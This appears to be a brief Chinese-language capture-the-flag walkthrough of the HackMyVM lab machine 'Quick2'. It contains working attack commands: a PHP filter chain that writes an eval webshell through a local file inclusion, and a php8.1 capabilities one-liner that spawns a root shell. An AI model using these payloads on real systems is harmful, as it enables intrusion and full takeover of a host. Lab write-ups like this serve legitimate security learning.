Hackmyvm quick2
简介
难度:简单
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Quick2
基本情况
kali:192.168.194.9
靶机:192.168.194.27
扫描
上来先nmap看看开了什么服务吧
基本上和之前差不多,常规的ssh和web服务。gobuster看看有啥路由文件
这个file.php看着挺奇怪的,访问下
本地文件包含漏洞,看看能不能读到本地文件。
可以读到本地文件,那么直接拿用户的flag。
提权
借助LFI漏洞,用php_filter_chain写一个webshell
python php_filter_chain_generator.py --chain '<?php eval($_POST["x"]);?>'
蚁剑连上,穿个linpeas看看
这里有个capabilities能用php8.1进行提权
运行命令php8.1 -r "posix_setuid(0); system('/bin/bash');"
拿下root权限!